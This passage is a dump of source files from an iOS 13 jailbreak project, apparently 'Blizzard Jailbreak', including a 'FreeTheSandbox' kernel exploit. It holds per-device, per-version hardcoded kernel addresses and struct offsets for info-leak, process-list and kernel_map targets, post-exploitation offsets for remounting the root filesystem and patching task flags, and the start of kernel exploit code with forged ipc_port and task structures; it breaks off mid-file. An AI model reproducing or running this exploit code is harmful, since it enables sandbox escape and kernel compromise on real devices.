"\n\n\n\n\tSchemeUserState\n\t\n\t\tsock_port.xcscheme_^#shared#^_\n\t\t\n\t\t\torderHint\n\t\t\t0\n\t\t\n\t\n\tSuppressBuildableAutocreation\n\t\n\t\t82F179EB22DF4ED700231F8C\n\t\t\n\t\t\tprimary\n\t\t\t\n\t\t\n\t\t82F17A0322DF4ED800231F8C\n\t\t\n\t\t\tprimary\n\t\t\t\n\t\t\n\t\t82F17A0E22DF4ED800231F8C\n\t\t\n\t\t\tprimary\n\t\t\t\n\t\t\n\t\n\n\n" }, { "path": "Exploits/FreeTheSandbox/IOTypes.h", "content": "/*\n * Copyright (c) 1998-2012 Apple Computer, Inc. All rights reserved.\n *\n * @APPLE_OSREFERENCE_LICENSE_HEADER_START@\n *\n * This file contains Original Code and/or Modifications of Original Code\n * as defined in and that are subject to the Apple Public Source License\n * Version 2.0 (the 'License'). You may not use this file except in\n * compliance with the License. The rights granted to you under the License\n * may not be used to create, or enable the creation or redistribution of,\n * unlawful or unlicensed copies of an Apple operating system, or to\n * circumvent, violate, or enable the circumvention or violation of, any\n * terms of an Apple operating system software license agreement.\n *\n * Please obtain a copy of the License at\n * http://www.opensource.apple.com/apsl/ and read it before using this file.\n *\n * The Original Code and all software distributed under the License are\n * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER\n * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,\n * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.\n * Please see the License for the specific language governing rights and\n * limitations under the License.\n *\n * @APPLE_OSREFERENCE_LICENSE_HEADER_END@\n */\n#ifndef __IOKIT_IOTYPES_H\n#define __IOKIT_IOTYPES_H\n\n#ifndef IOKIT\n#define IOKIT 1\n#endif /* !IOKIT */\n\n#include \n#include \n\n#include \"IOReturn.h\"\n\n#ifdef __cplusplus\nextern \"C\" {\n#endif\n \n#ifndef NULL\n#if defined (__cplusplus)\n#define NULL 0\n#else\n#define NULL ((void *)0)\n#endif\n#endif\n \n /*\n * Simple data types.\n */\n#include \n#define OSTYPES_K64_REV 2\n \n typedef unsigned int UInt;\n typedef signed int SInt;\n \n \n typedef UInt32 IOOptionBits;\n typedef SInt32 IOFixed;\n typedef UInt32 IOVersion;\n typedef UInt32 IOItemCount;\n typedef UInt32 IOCacheMode;\n \n typedef UInt32 IOByteCount32;\n typedef UInt64 IOByteCount64;\n \n typedef UInt32 IOPhysicalAddress32;\n typedef UInt64 IOPhysicalAddress64;\n typedef UInt32 IOPhysicalLength32;\n typedef UInt64 IOPhysicalLength64;\n \n#if !defined(__arm__) && !defined(__i386__)\n typedef mach_vm_address_t IOVirtualAddress;\n#else\n typedef vm_address_t IOVirtualAddress;\n#endif\n \n#if !defined(__arm__) && !defined(__i386__) && !(defined(__x86_64__) && !defined(KERNEL))\n typedef IOByteCount64 IOByteCount;\n#else\n typedef IOByteCount32 IOByteCount;\n#endif\n \n typedef IOVirtualAddress IOLogicalAddress;\n \n#if !defined(__arm__) && !defined(__i386__) && !(defined(__x86_64__) && !defined(KERNEL))\n \n typedef IOPhysicalAddress64 IOPhysicalAddress;\n typedef IOPhysicalLength64 IOPhysicalLength;\n#define IOPhysical32( hi, lo ) ((UInt64) lo + ((UInt64)(hi) << 32))\n#define IOPhysSize 64\n \n#else\n \n typedef IOPhysicalAddress32 IOPhysicalAddress;\n typedef IOPhysicalLength32 IOPhysicalLength;\n#define IOPhysical32( hi, lo ) (lo)\n#define IOPhysSize 32\n \n#endif\n \n \n typedef struct\n {\n IOPhysicalAddress address;\n IOByteCount length;\n } IOPhysicalRange;\n \n typedef struct\n {\n IOVirtualAddress address;\n IOByteCount length;\n } IOVirtualRange;\n \n#if !defined(__arm__) && !defined(__i386__)\n typedef IOVirtualRange IOAddressRange;\n#else\n typedef struct\n {\n mach_vm_address_t address;\n mach_vm_size_t length;\n } IOAddressRange;\n#endif\n \n /*\n * Map between #defined or enum'd constants and text description.\n */\n typedef struct {\n int value;\n const char *name;\n } IONamedValue;\n \n \n /*\n * Memory alignment -- specified as a power of two.\n */\n typedef unsigned int IOAlignment;\n \n#define IO_NULL_VM_TASK ((vm_task_t)0)\n \n \n /*\n * Pull in machine specific stuff.\n */\n \n //#include \n \n#ifndef MACH_KERNEL\n \n#ifndef __IOKIT_PORTS_DEFINED__\n#define __IOKIT_PORTS_DEFINED__\n typedef mach_port_t io_object_t;\n#endif /* __IOKIT_PORTS_DEFINED__ */\n \n#include \n \n typedef io_object_t io_connect_t;\n typedef io_object_t io_enumerator_t;\n typedef io_object_t io_iterator_t;\n typedef io_object_t io_registry_entry_t;\n typedef io_object_t io_service_t;\n \n#define IO_OBJECT_NULL ((io_object_t) 0)\n \n#endif /* MACH_KERNEL */\n \n // IOConnectMapMemory memoryTypes\n enum {\n kIODefaultMemoryType = 0\n };\n \n enum {\n kIODefaultCache = 0,\n kIOInhibitCache = 1,\n kIOWriteThruCache = 2,\n kIOCopybackCache = 3,\n kIOWriteCombineCache = 4,\n kIOCopybackInnerCache = 5,\n kIOPostedWrite = 6\n };\n \n // IOMemory mapping options\n enum {\n kIOMapAnywhere = 0x00000001,\n \n kIOMapCacheMask = 0x00000700,\n kIOMapCacheShift = 8,\n kIOMapDefaultCache = kIODefaultCache << kIOMapCacheShift,\n kIOMapInhibitCache = kIOInhibitCache << kIOMapCacheShift,\n kIOMapWriteThruCache = kIOWriteThruCache << kIOMapCacheShift,\n kIOMapCopybackCache = kIOCopybackCache << kIOMapCacheShift,\n kIOMapWriteCombineCache = kIOWriteCombineCache << kIOMapCacheShift,\n kIOMapCopybackInnerCache = kIOCopybackInnerCache << kIOMapCacheShift,\n kIOMapPostedWrite = kIOPostedWrite << kIOMapCacheShift,\n \n kIOMapUserOptionsMask = 0x00000fff,\n \n kIOMapReadOnly = 0x00001000,\n \n kIOMapStatic = 0x01000000,\n kIOMapReference = 0x02000000,\n kIOMapUnique = 0x04000000,\n kIOMapPrefault = 0x10000000,\n kIOMapOverwrite = 0x20000000\n };\n \n /*! @enum Scale Factors\n @discussion Used when a scale_factor parameter is required to define a unit of time.\n @constant kNanosecondScale Scale factor for nanosecond based times.\n @constant kMicrosecondScale Scale factor for microsecond based times.\n @constant kMillisecondScale Scale factor for millisecond based times.\n @constant kTickScale Scale factor for the standard (100Hz) tick.\n @constant kSecondScale Scale factor for second based times. */\n \n enum {\n kNanosecondScale = 1,\n kMicrosecondScale = 1000,\n kMillisecondScale = 1000 * 1000,\n kSecondScale = 1000 * 1000 * 1000,\n kTickScale = (kSecondScale / 100)\n };\n \n enum {\n kIOConnectMethodVarOutputSize = -3\n };\n \n /* compatibility types */\n \n \n typedef unsigned int IODeviceNumber;\n \n \n#ifdef __cplusplus\n}\n#endif\n\n#endif /* ! __IOKIT_IOTYPES_H */\n" }, { "path": "Exploits/FreeTheSandbox/freethesandbox.h", "content": "//\n// freethesandbox.h\n// Blizzard Jailbreak\n//\n// Created by GeoSn0w on 11/20/20.\n// Copyright © 2020 GeoSn0w. All rights reserved.\n//\n\n#ifndef freethesandbox_h\n#define freethesandbox_h\nvoid iOS13_exploit_init(void);\n\n#endif /* freethesandbox_h */\n" }, { "path": "Exploits/FreeTheSandbox/ios13_change_offsets.m", "content": "//\n// ios13_change_offsets.c\n// ios13_app1\n//\n// Created by bb on 1/25/20.\n// Copyright © 2020 bb. All rights reserved.\n//\n\n\n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \"IOKitLib.h\"\n#include \n#include \n#include \n#import \n#import \n\n#pragma mark --- External API\n//set share_analytics = false to disable analytics sharing\nshare_analytics = true;\n\n#define SYSTEM_VERSION_EQUAL_TO(v) ([[[UIDevice currentDevice] systemVersion] compare:v options:NSNumericSearch] == NSOrderedSame)\n#define SYSTEM_VERSION_GREATER_THAN(v) ([[[UIDevice currentDevice] systemVersion] compare:v options:NSNumericSearch] == NSOrderedDescending)\n#define SYSTEM_VERSION_GREATER_THAN_OR_EQUAL_TO(v) ([[[UIDevice currentDevice] systemVersion] compare:v options:NSNumericSearch] != NSOrderedAscending)\n#define SYSTEM_VERSION_LESS_THAN(v) ([[[UIDevice currentDevice] systemVersion] compare:v options:NSNumericSearch] == NSOrderedAscending)\n#define SYSTEM_VERSION_LESS_THAN_OR_EQUAL_TO(v) ([[[UIDevice currentDevice] systemVersion] compare:v options:NSNumericSearch] != NSOrderedDescending)\n\nbool check_if_iOS_version_equal_to(const char *cmpto_version){\n CFStringRef cfstrwrap = CFStringCreateWithCString(kCFAllocatorDefault, cmpto_version, kCFStringEncodingUTF8);\n \n if (SYSTEM_VERSION_EQUAL_TO((__bridge NSString * _Nonnull)(cfstrwrap))) {\n return true;\n }\n \n CFRelease(cfstrwrap);\n return false;\n}\n\nbool check_if_iOS_version_greater_than_or_equal_to(const char *cmpto_version){\n CFStringRef cfstrwrap = CFStringCreateWithCString(kCFAllocatorDefault, cmpto_version, kCFStringEncodingUTF8);\n \n if (SYSTEM_VERSION_GREATER_THAN_OR_EQUAL_TO((__bridge NSString * _Nonnull)(cfstrwrap))) {\n return true;\n }\n \n CFRelease(cfstrwrap);\n return false;\n}\n\nbool check_if_iOS_version_less_then(const char *cmpto_version){\n CFStringRef cfstrwrap = CFStringCreateWithCString(kCFAllocatorDefault, cmpto_version, kCFStringEncodingUTF8);\n \n if (SYSTEM_VERSION_LESS_THAN((__bridge NSString * _Nonnull)(cfstrwrap))) {\n return true;\n }\n \n CFRelease(cfstrwrap);\n return false;\n}\n\nbool check_if_its_PAC_device(){\n#if __arm64e__\n return true;\n#endif\n return false;\n}\n\nbool check_if_amfid_has_entitParser(){\n if(check_if_iOS_version_greater_than_or_equal_to(\"13.5\"))\n return true;\n return false;\n}\n\nchar *_cur_deviceModel = NULL;\nchar *get_current_deviceModel(){\n if(_cur_deviceModel)\n return _cur_deviceModel;\n struct utsname systemInfo;\n uname(&systemInfo);\n NSString* code = [NSString stringWithCString:systemInfo.machine\n encoding:NSUTF8StringEncoding];\n static NSDictionary* deviceNamesByCode = nil;\n if (!deviceNamesByCode) {\n deviceNamesByCode = @{@\"i386\" : @\"Simulator\",\n @\"x86_64\" : @\"Simulator\",\n @\"iPod1,1\" : @\"iPod Touch\", // (Original)\n @\"iPod2,1\" : @\"iPod Touch\", // (Second Generation)\n @\"iPod3,1\" : @\"iPod Touch\", // (Third Generation)\n @\"iPod4,1\" : @\"iPod Touch\", // (Fourth Generation)\n @\"iPod7,1\" : @\"iPod Touch\", // (6th Generation)\n @\"iPhone1,1\" : @\"iPhone\", // (Original)\n @\"iPhone1,2\" : @\"iPhone\", // (3G)\n @\"iPhone2,1\" : @\"iPhone\", // (3GS)\n @\"iPad1,1\" : @\"iPad\", // (Original)\n @\"iPad2,1\" : @\"iPad 2\", //\n @\"iPad3,1\" : @\"iPad\", // (3rd Generation)\n @\"iPhone3,1\" : @\"iPhone 4\", // (GSM)\n @\"iPhone3,3\" : @\"iPhone 4\", // (CDMA/Verizon/Sprint)\n @\"iPhone4,1\" : @\"iPhone 4S\", //\n @\"iPhone5,1\" : @\"iPhone 5\", // (model A1428, AT&T/Canada)\n @\"iPhone5,2\" : @\"iPhone 5\", // (model A1429, everything else)\n @\"iPad3,4\" : @\"iPad\", // (4th Generation)\n @\"iPad2,5\" : @\"iPad Mini\", // (Original)\n @\"iPhone5,3\" : @\"iPhone 5c\", // (model A1456, A1532 | GSM)\n @\"iPhone5,4\" : @\"iPhone 5c\", // (model A1507, A1516, A1526 (China), A1529 | Global)\n @\"iPhone6,1\" : @\"iPhone 5s\", // (model A1433, A1533 | GSM)\n @\"iPhone6,2\" : @\"iPhone 5s\", // (model A1457, A1518, A1528 (China), A1530 | Global)\n @\"iPhone7,1\" : @\"iPhone 6 Plus\", //\n @\"iPhone7,2\" : @\"iPhone 6\", //\n @\"iPhone8,1\" : @\"iPhone 6S\", //\n @\"iPhone8,2\" : @\"iPhone 6S Plus\", //\n @\"iPhone8,4\" : @\"iPhone SE\", //\n @\"iPhone9,1\" : @\"iPhone 7\", //\n @\"iPhone9,3\" : @\"iPhone 7\", //\n @\"iPhone9,2\" : @\"iPhone 7 Plus\", //\n @\"iPhone9,4\" : @\"iPhone 7 Plus\", //\n @\"iPhone10,1\": @\"iPhone 8\", // CDMA\n @\"iPhone10,4\": @\"iPhone 8\", // GSM\n @\"iPhone10,2\": @\"iPhone 8 Plus\", // CDMA\n @\"iPhone10,5\": @\"iPhone 8 Plus\", // GSM\n @\"iPhone10,3\": @\"iPhone X\", // CDMA\n @\"iPhone10,6\": @\"iPhone X\", // GSM\n @\"iPhone11,2\": @\"iPhone XS\", //\n @\"iPhone11,4\": @\"iPhone XS Max\", //\n @\"iPhone11,6\": @\"iPhone XS Max\", // China\n @\"iPhone11,8\": @\"iPhone XR\", //\n @\"iPhone12,1\": @\"iPhone 11\", //\n @\"iPhone12,3\": @\"iPhone 11 Pro\", //\n @\"iPhone12,5\": @\"iPhone 11 Pro Max\", //\n \n @\"iPad4,1\" : @\"iPad Air\", // 5th Generation iPad (iPad Air) - Wifi\n @\"iPad4,2\" : @\"iPad Air\", // 5th Generation iPad (iPad Air) - Cellular\n @\"iPad4,4\" : @\"iPad Mini\", // (2nd Generation iPad Mini - Wifi)\n @\"iPad4,5\" : @\"iPad Mini\", // (2nd Generation iPad Mini - Cellular)\n @\"iPad4,7\" : @\"iPad Mini\", // (3rd Generation iPad Mini - Wifi (model A1599))\n @\"iPad6,7\" : @\"iPad Pro (12.9\\\")\", // iPad Pro 12.9 inches - (model A1584)\n @\"iPad6,8\" : @\"iPad Pro (12.9\\\")\", // iPad Pro 12.9 inches - (model A1652)\n @\"iPad6,3\" : @\"iPad Pro (9.7\\\")\", // iPad Pro 9.7 inches - (model A1673)\n @\"iPad6,4\" : @\"iPad Pro (9.7\\\")\" // iPad Pro 9.7 inches - (models A1674 and A1675)\n };\n }\n NSString* deviceName = [deviceNamesByCode objectForKey:code];\n if (!deviceName) {\n // Not found on database. At least guess main device type from string contents:\n \n if ([code rangeOfString:@\"iPod\"].location != NSNotFound) {\n deviceName = @\"iPod Touch\";\n }\n else if([code rangeOfString:@\"iPad\"].location != NSNotFound) {\n deviceName = @\"iPad\";\n }\n else if([code rangeOfString:@\"iPhone\"].location != NSNotFound){\n deviceName = @\"iPhone\";\n }\n else {\n deviceName = @\"Unknown\";\n }\n }\n _cur_deviceModel = strdup([deviceName UTF8String]);\n return _cur_deviceModel;\n}\n\n\n#pragma mark --- Hardcoded values\n\n// HARDCODED addresses used in kernel\nuint64_t HARDCODED_infoleak_addr = 0; // vtable of IOSurface\nuint64_t HARDCODED_allproc = 0; // via IDA search pgrp_add : pgrp is dead adding process\nuint64_t HARDCODED_kernel_map = 0; // via jtool2\n\n// HARDCODED offsets used in kernel\nuint32_t OFFSET_bsd_info_pid = 0x68; // +0x68: bsd_info->pid\nuint32_t OFFSET_bsd_info_task = 0x10; // +0x10: bsd_info->task\nuint32_t OFFSET_task_itk_task_access = 0x2F8; // +0x2F8: task->itk_task_access (ios13.x)\nuint32_t OFFSET_task_itk_registered = 0x308; // +0x308: task->itk_registered (ios13.x)\nuint32_t OFFSET_task_t_flags; // for TF_PLATFORM Patch\n\n// HARDCODED zone index used in kernel\nuint32_t zone_index_ipc_ports = 42;\nuint32_t zone_index_tasks = 58;\n\n// --- following addr/offsets are post-exp\n\n// HARDCODED addresses used in kernel for remount rootFS\nuint64_t HARDCODED_jnodehash_mask = 0;\nuint64_t HARDCODED_jjnodehashtbl = 0;\nuint32_t OFFSET_bsd_info_p_fd = 0x108; // pac: 0x108\nuint32_t OFFSET_fileproc_f_fglob = 0x10; // pac: 0x10 // for use of find_vnode_with_path\nuint32_t OFFSET_fileglob_fg_data = 0x38; // pac: 0x38 // for use of find_vnode_with_path\nuint32_t OFFSET_vnode_v_data = 0xE0; // pac: 0xE0 find the snapshot stru off a vnode, used in patch_snapshot_vnode\nuint32_t OFFSET_vnode_v_mount = 0xD8; // pac: 0xD8 // for find the mount structure off a vnode\nuint32_t OFFSET_mount_mnt_flag = 0x70; // pac: 0x70 // for remove read-only flag on mount stru\n\n#pragma mark --- Check device\n\nbool check_device_compatibility(){\n extern int Apply_hardcoded_addresses_and_offsets(void);\n \n if(Apply_hardcoded_addresses_and_offsets() == 0)\n return true;\n return false;\n}\n\nint Apply_hardcoded_addresses_and_offsets(){\n \n if(!strcmp(get_current_deviceModel(), \"iPhone X\")){\n int apply_to_iPhone_X(void);\n return apply_to_iPhone_X();\n }\n else if(!strcmp(get_current_deviceModel(), \"iPhone 11 Pro Max\")){\n int apply_to_iPhone_11_pro_max(void);\n return apply_to_iPhone_11_pro_max();\n }else if(!strcmp(get_current_deviceModel(), \"iPhone 7 Plus\")){\n int apply_to_iPhone_7_plus(void);\n return apply_to_iPhone_7_plus();\n }\n else if(!strcmp(get_current_deviceModel(), \"iPhone XS\")){\n int apply_to_iPhone_XS(void);\n return apply_to_iPhone_XS();\n }\n \n \n (printf)(\"Execution pause: Not found offsets set for current device(model: %s)\\n\", get_current_deviceModel());\n return -1;\n}\n\n#pragma mark --- iPhone X\n\nint apply_to_iPhone_X(){\n \n OFFSET_task_t_flags = 0x3B8; // take from iphoneX 13.2.x, think it remains the same in all non-pac device\n \n if(check_if_iOS_version_greater_than_or_equal_to(\"13.2\") && check_if_iOS_version_less_then(\"13.3\")){\n // iOS 13.2.x on iPhone X\n HARDCODED_infoleak_addr = 0xfffffff007a10fb0;\n HARDCODED_allproc = 0xFFFFFFF0091EAC50;\n HARDCODED_kernel_map = 0xfffffff007905658;\n }\n else if(check_if_iOS_version_equal_to(\"13.3\")){\n // iOS 13.3 on iPhone X\n HARDCODED_infoleak_addr = 0xFFFFFFF007A150D0;\n HARDCODED_allproc = 0xFFFFFFF0091EEC30;\n HARDCODED_kernel_map = 0xfffffff007909658;\n \n HARDCODED_jnodehash_mask = 0xFFFFFFF009225CD4;\n HARDCODED_jjnodehashtbl = 0xFFFFFFF009225CD8;\n \n }\n else if(check_if_iOS_version_greater_than_or_equal_to(\"13.3.1\") && check_if_iOS_version_less_then(\"13.3.2\")){\n // iOS 13.3.1 on iPhone X\n HARDCODED_infoleak_addr = 0xFFFFFFF007A21150;\n HARDCODED_allproc = 0xFFFFFFF009232C30;\n HARDCODED_kernel_map = 0xfffffff007915658;\n \n HARDCODED_jnodehash_mask = 0xFFFFFFF009269CD4;\n HARDCODED_jjnodehashtbl = 0xFFFFFFF009269CD8;\n \n }\n else if(check_if_iOS_version_greater_than_or_equal_to(\"13.4\") && check_if_iOS_version_less_then(\"13.4.2\")){\n \n zone_index_tasks = 60;\n \n // iOS 13.4\n HARDCODED_infoleak_addr = 0xFFFFFFF007A5E7D8;\n HARDCODED_allproc = 0xFFFFFFF00926FC60;\n HARDCODED_kernel_map = 0xFFFFFFF00794D6A8;\n }\n else if(check_if_iOS_version_equal_to(\"13.4.5\")){\n \n zone_index_tasks = 60;\n \n // iOS 13.4.5 beta, 后来改名为 13.5 beta\n HARDCODED_infoleak_addr = 0xFFFFFFF007A5E7D8;\n HARDCODED_allproc = 0xFFFFFFF00926FC60;\n HARDCODED_kernel_map = 0xFFFFFFF00794D6A8;\n }\n else if(check_if_iOS_version_greater_than_or_equal_to(\"13.5\") && check_if_iOS_version_less_then(\"13.5.2\")){\n \n zone_index_tasks = 60;\n \n // iOS 13.5/13.5.1\n HARDCODED_infoleak_addr = 0xFFFFFFF007A427E8;\n HARDCODED_allproc = 0xFFFFFFF0092544B0;\n HARDCODED_kernel_map = 0xfffffff0079316a8;\n }\n else if(check_if_iOS_version_greater_than_or_equal_to(\"13.6\") && check_if_iOS_version_less_then(\"13.6.2\")){\n \n zone_index_tasks = 60;\n \n // iOS 13.6/13.6.1\n HARDCODED_infoleak_addr = 0xFFFFFFF007A427F8;\n HARDCODED_allproc = 0xFFFFFFF009257AB0;\n HARDCODED_kernel_map = 0xfffffff0079316c0;\n }\n else if(check_if_iOS_version_greater_than_or_equal_to(\"13.7\") && check_if_iOS_version_less_then(\"13.7.1\")){\n \n zone_index_tasks = 60;\n \n // iOS 13.7\n HARDCODED_infoleak_addr = 0xFFFFFFF007A427F8;\n HARDCODED_allproc = 0xFFFFFFF009257AB0;\n HARDCODED_kernel_map = 0xfffffff0079316c0;\n }\n else{\n printf(\"Execution pause: require update hardcoded addresses and offsets\\n\");\n return -1;\n }\n \n return 0;\n}\n\n#pragma mark --- iPhone 11 Pro Max\n\nint apply_to_iPhone_11_pro_max(){\n \n OFFSET_task_t_flags = 0x3C0; // confirmed remains the same in iphonexs max(13.1.x ~ 13.3.x)\n \n // zone index changes likely can apply to all PAC device\n zone_index_tasks = 57;\n \n if(check_if_iOS_version_greater_than_or_equal_to(\"13.3.1\") && check_if_iOS_version_less_then(\"13.3.2\")){\n \n // iOS 13.3.1\n HARDCODED_infoleak_addr = 0xFFFFFFF0079F4760;\n HARDCODED_allproc = 0xFFFFFFF00945C940;\n HARDCODED_kernel_map = 0xfffffff0078d1768;\n }\n else if(check_if_iOS_version_greater_than_or_equal_to(\"13.4\") && check_if_iOS_version_less_then(\"13.4.2\")){\n \n zone_index_tasks = 59;\n \n // iOS 13.4\n HARDCODED_infoleak_addr = 0xFFFFFFF007A30C78;\n HARDCODED_allproc = 0xFFFFFFF0094A5970;\n HARDCODED_kernel_map = 0xFFFFFFF007909678;\n }\n else if(check_if_iOS_version_greater_than_or_equal_to(\"13.5\") && check_if_iOS_version_less_then(\"13.5.2\")){\n \n zone_index_tasks = 59;\n \n // iOS 13.5/13.5.1\n HARDCODED_infoleak_addr = 0xFFFFFFF007A10C88;\n HARDCODED_allproc = 0xFFFFFFF0094821C0;\n HARDCODED_kernel_map = 0xfffffff0078e9678;\n }\n else if(check_if_iOS_version_greater_than_or_equal_to(\"13.6\") && check_if_iOS_version_less_then(\"13.6.2\")){\n \n zone_index_tasks = 59;\n \n // iOS 13.6/13.6.1\n HARDCODED_infoleak_addr = 0xFFFFFFF007A18C98;\n HARDCODED_allproc = 0xFFFFFFF009481800;\n HARDCODED_kernel_map = 0xfffffff0078f1690;\n }\n else if(check_if_iOS_version_greater_than_or_equal_to(\"13.7\") && check_if_iOS_version_less_then(\"13.7.1\")){\n zone_index_tasks = 59;\n \n // iOS 13.7\n HARDCODED_infoleak_addr = 0xFFFFFFF007A18C98;\n HARDCODED_allproc = 0xFFFFFFF009481800;\n HARDCODED_kernel_map = 0xfffffff0078f1690;\n }\n else{\n printf(\"Execution pause: require update hardcoded addresses and offsets\\n\");\n return -1;\n }\n \n return 0;\n}\n\nint apply_to_iPhone_7_plus(){\n \n OFFSET_task_t_flags = 0x3B8; // confirmed remains the same in iphonexs max(13.1.x ~ 13.3.x)\n \n // zone index changes likely can apply to all PAC device\n zone_index_tasks = 58;\n \n if(check_if_iOS_version_greater_than_or_equal_to(\"13.4.1\") && check_if_iOS_version_less_then(\"13.3.2\")){\n \n // iOS 13.3.1\n HARDCODED_infoleak_addr = 0xfffffff006dc4f38;\n HARDCODED_allproc = 0xFFFFFFF007767860;\n HARDCODED_kernel_map = 0xfffffff0070d0aa8;\n }\n else if(check_if_iOS_version_greater_than_or_equal_to(\"13.6\") && check_if_iOS_version_less_then(\"13.6.2\")){\n \n // iOS 13.6/13.6.1\n HARDCODED_infoleak_addr = 0xFFFFFFF006DBCEF8;\n HARDCODED_allproc = 0xFFFFFFF007770FA0;\n HARDCODED_kernel_map = 0xFFFFFFF0070D0A90;\n }\n else{\n printf(\"Execution pause: require update hardcoded addresses and offsets\\n\");\n return -1;\n }\n \n return 0;\n}\n\nint apply_to_iPhone_XS(){\n \n OFFSET_task_t_flags = 0x3C0;\n \n // zone index changes likely can apply to all PAC device\n zone_index_tasks = 57;\n \n if(check_if_iOS_version_greater_than_or_equal_to(\"13.5\") && check_if_iOS_version_less_then(\"13.5.2\")){\n \n zone_index_tasks = 59;\n \n // iOS 13.5/13.5.1\n HARDCODED_infoleak_addr = 0xFFFFFFF007917A18;\n HARDCODED_allproc = 0xFFFFFFF0093AB1B0;\n HARDCODED_kernel_map = 0xfffffff00789d678;\n }\n else if(check_if_iOS_version_greater_than_or_equal_to(\"13.6\") && check_if_iOS_version_less_then(\"13.6.2\")){\n \n zone_index_tasks = 59;\n \n // iOS 13.6/13.6.1\n HARDCODED_infoleak_addr = 0xFFFFFFF00791FA18;\n HARDCODED_allproc = 0xFFFFFFF0093AA7F0;\n HARDCODED_kernel_map = 0xfffffff0078a5690;\n }\n else if(check_if_iOS_version_greater_than_or_equal_to(\"13.7\") && check_if_iOS_version_less_then(\"13.7.1\")){\n zone_index_tasks = 59;\n \n // iOS 13.7\n HARDCODED_infoleak_addr = 0xFFFFFFF00791FA18;\n HARDCODED_allproc = 0xFFFFFFF0093AA7F0;\n HARDCODED_kernel_map = 0xfffffff0078a5690;\n }\n else{\n printf(\"Execution pause: require update hardcoded addresses and offsets\\n\");\n return -1;\n }\n \n return 0;\n}\n" }, { "path": "Exploits/FreeTheSandbox/ios13_kernel_universal.c", "content": "//\n// ios13_kernel_universal.c\n// ios13_app1\n//\n// Created by bb on 1/12/20.\n// Copyright © 2020 bb. All rights reserved.\n//\n\n// Update* For 13.4/13.4.1 Support\n// Update* For 13.6/13.6.1 Support\n// Update* For 13.7 Support\n\n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \"IOKitLib.h\"\n#include \n#include \n\n//Share analytics\nextern bool share_analytics;\n\n// HARDCODED addresses used in kernel\nextern uint64_t HARDCODED_infoleak_addr;\nextern uint64_t HARDCODED_allproc;\nextern uint64_t HARDCODED_kernel_map;\n\n// HARDCODED offsets used in kernel\nextern uint32_t OFFSET_bsd_info_pid;\nextern uint32_t OFFSET_bsd_info_task;\nextern uint32_t OFFSET_task_itk_task_access;\nextern uint32_t OFFSET_task_itk_registered;\nextern uint32_t OFFSET_task_t_flags;\n\n// HARDCODED zone index used in kernel\nextern uint32_t zone_index_ipc_ports;\nextern uint32_t zone_index_tasks;\n\nextern void Apply_hardcoded_addresses_and_offsets(void);\n\njmp_buf reattempt_jmpb;\n\n#define IO_BITS_PORT_INFO 0x0000f000\n#define IO_BITS_KOTYPE 0x00000fff\n#define IO_BITS_KOBJECT 0x00000800\n#define IO_BITS_OTYPE 0x7fff0000\n#define IO_BITS_ACTIVE 0x80000000\n\n#define IKOT_NONE 0\n#define IKOT_THREAD 1\n#define IKOT_TASK 2\n#define IKOT_HOST 3\n#define IKOT_HOST_PRIV 4\n#define IKOT_PROCESSOR 5\n#define IKOT_PSET 6\n#define IKOT_PSET_NAME 7\n#define IKOT_TIMER 8\n#define IKOT_PAGING_REQUEST 9\n#define IKOT_MIG 10\n#define IKOT_MEMORY_OBJECT 11\n#define IKOT_XMM_PAGER 12\n#define IKOT_XMM_KERNEL 13\n#define IKOT_XMM_REPLY 14\n#define IKOT_UND_REPLY 15\n#define IKOT_HOST_NOTIFY 16\n#define IKOT_HOST_SECURITY 17\n#define IKOT_LEDGER 18\n#define IKOT_MASTER_DEVICE 19\n#define IKOT_TASK_NAME 20\n#define IKOT_SUBSYSTEM 21\n#define IKOT_IO_DONE_QUEUE 22\n#define IKOT_SEMAPHORE 23\n#define IKOT_LOCK_SET 24\n#define IKOT_CLOCK 25\n#define IKOT_CLOCK_CTRL 26\n#define IKOT_IOKIT_SPARE 27\n#define IKOT_NAMED_ENTRY 28\n#define IKOT_IOKIT_CONNECT 29\n#define IKOT_IOKIT_OBJECT 30\n#define IKOT_UPL 31\n#define IKOT_MEM_OBJ_CONTROL 32\n#define IKOT_AU_SESSIONPORT 33\n#define IKOT_FILEPORT 34\n#define IKOT_LABELH 35\n#define IKOT_TASK_RESUME 36\n\nvolatile struct ipc_port {\n uint32_t ip_bits;\n uint32_t ip_references;\n struct {\n uint64_t data;\n uint64_t type;\n } ip_lock; // spinlock\n struct {\n struct {\n struct {\n uint32_t flags;\n uint32_t waitq_interlock;\n uint64_t waitq_set_id;\n uint64_t waitq_prepost_id;\n struct {\n uint64_t next;\n uint64_t prev;\n } waitq_queue;\n } waitq;\n uint64_t messages;\n uint32_t seqno;\n uint32_t receiver_name;\n uint16_t msgcount;\n uint16_t qlimit;\n uint32_t pad;\n } port;\n uint64_t klist;\n } ip_messages;\n uint64_t ip_receiver;\n uint64_t ip_kobject;\n // above stru members are pretty stable across versions, below is not, plz pay attenion to change\n uint64_t ip_nsrequest;\n uint64_t ip_pdrequest;\n uint64_t ip_requests;\n uint64_t ip_premsg;\n uint64_t ip_context;\n uint32_t ip_flags;\n uint32_t ip_mscount;\n uint32_t ip_srights;\n uint32_t ip_sorights;\n};\n\nvolatile struct task\n{\n struct {\n uint64_t data;\n uint32_t reserved : 24,\n type : 8;\n uint32_t pad;\n } lock; // mutex lock\n uint32_t ref_count;\n uint32_t active;\n uint32_t halting;\n uint32_t pad;\n uint32_t pad2;\n uint32_t pad3;\n uint64_t map;\n};\n\nenum\n{\n kOSSerializeDictionary = 0x01000000U,\n kOSSerializeArray = 0x02000000U,\n kOSSerializeSet = 0x03000000U,\n kOSSerializeNumber = 0x04000000U,\n kOSSerializeSymbol = 0x08000000U,\n kOSSerializeString = 0x09000000U,\n kOSSerializeData = 0x0a000000U,\n kOSSerializeBoolean = 0x0b000000U,\n kOSSerializeObject = 0x0c000000U,\n \n kOSSerializeTypeMask = 0x7F000000U,\n kOSSerializeDataMask = 0x00FFFFFFU,\n \n kOSSerializeEndCollection = 0x80000000U,\n \n kOSSerializeMagic = 